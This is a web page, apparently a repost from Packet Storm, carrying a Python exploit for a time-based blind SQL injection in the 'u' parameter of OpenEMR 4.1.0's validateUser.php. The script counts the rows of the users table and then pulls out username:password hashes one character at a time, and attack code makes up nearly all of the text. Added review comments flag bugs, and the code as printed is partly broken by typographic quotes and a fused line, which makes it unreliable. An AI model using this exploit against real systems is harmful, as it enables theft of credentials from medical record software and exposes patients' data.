OpenEMR 4.1.0 SQL Injection ≈ Packet Storm – Digitalmunition





Published on April 6th, 2021 📆 | 7414 Views ⚑


OpenEMR 4.1.0 SQL Injection ≈ Packet Storm

# Exploit Title: OpenEMR 4.1.0 – ‘u’ SQL Injection
# Date: 2021-04-03
# Exploit Author: Michael Ikua
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip
# Version: 4.1.0
# Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/

#!/usr/bin/env python3

import requests
import string
import sys

# Start-up banner; purely cosmetic, nothing below depends on it.
print(“””
____ ________ _______ __ __ ___ ____
/ __ ____ ___ ____ / ____/ |/ / __ / // / < // __ \
/ / / / __ / _ / __ / __/ / /|_/ / /_/ / / // /_ / // / / /
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /
____/ .___/___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/
/_/
____ ___ __ _____ ____ __ _
/ __ )/ (_)___ ____/ / / ___// __ / / (_)
/ /_/ / / / __ / __ / __ / / / / / / / /
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/__,_/ /____/____/_____/_/ exploit by @ikuamike
“””)

# Candidate alphabet tried at every character position by extract_users().
# NOTE(review): this shadows the builtin `all` for the rest of the module.
all = string.printable
# edit url to point to your openemr instance
# The injection point is the `u` query parameter of validateUser.php (see the
# advisory in the header). Each probe below is appended to this string as
# URL-encoded SQL, i.e. the parameter is concatenated into a query server-side
# without parameterization — the usual fix is a prepared statement.
url = “http://192.168.56.106/openemr/interface/login/validateUser.php?u=”

def extract_users_num():
"""Infer the row count of the `users` table with a time-based blind probe.

For each candidate n in 1..99 the injected SQL calls sleep(3) only when
count(username) == n, so a response slower than 3 s is taken as a match.

Returns:
the first n whose request exceeded 3 s.
NOTE(review): if no n triggers the delay, `user_length` is never assigned
and the final print raises UnboundLocalError.
"""
print(“[+] Finding number of users…”)
for n in range(1,100):
# %2b is a URL-encoded '+', so the payload lands as arithmetic around the
# conditional sleep.
payload = ”%2b(SELECT+if((select count(username) from users)=’ + str(n) + ‘,sleep(3),1))%2b”
r = requests.get(url+payload)
# Timing oracle: any response delayed past 3 s for whatever reason (load,
# network) satisfies this check, not only the sleep() branch.
if r.elapsed.total_seconds() > 3:
user_length = n
break
print(“[+] Found number of users: ” + str(user_length))
return user_length

def extract_users():
"""Recover the `username:password` string from `users` one character at a time.

Two further probes reuse the sleep(3) timing oracle from extract_users_num():
first the total length of group_concat(username,':',password) is found by
trying n in 1..999, then every position 1..length is tested against each
character in `all` (string.printable). Matching characters are echoed as
they are found; a ',' (group_concat's row separator) starts a new line.

NOTE(review): `users` is computed but never read afterwards; `length` is
unbound if no n triggers the delay; `output` is filled but never returned.
"""
users = extract_users_num()
print(“[+] Extracting username and password hash…”)
# NOTE(review): `output = []` and the `for` header are fused on the next
# line — a paste/extraction artifact; as written this is not valid Python.
output = []for n in range(1,1000):
payload = ”%2b(SELECT+if(length((select+group_concat(username,’:’,password)+from+users+limit+0,1))=’ + str(n) + ‘,sleep(3),1))%2b”
#print(payload)
r = requests.get(url+payload)
#print(r.request.url)
if r.elapsed.total_seconds() > 3:
length = n
break
# One request per (position, candidate char): up to len(all) requests for
# each character, each matching one taking about 3 s.
for i in range(1,length+1):
for char in all:
payload = ”%2b(SELECT+if(ascii(substr((select+group_concat(username,’:’,password)+from+users+limit+0,1),’+ str(i)+’,1))=’+str(ord(char))+’,sleep(3),1))%2b”
#print(payload)
r = requests.get(url+payload)
#print(r.request.url)
if r.elapsed.total_seconds() > 3:
output.append(char)
if char == “,”:
print(“”)
continue
print(char, end=”, flush=True)

# Script entry point (no `if __name__ == "__main__":` guard, so importing the
# module also runs the extraction). Ctrl-C ends the run with exit status 0.
try:
extract_users()
except KeyboardInterrupt:
print(“”)
print(“[+] Exiting…”)
sys.exit()
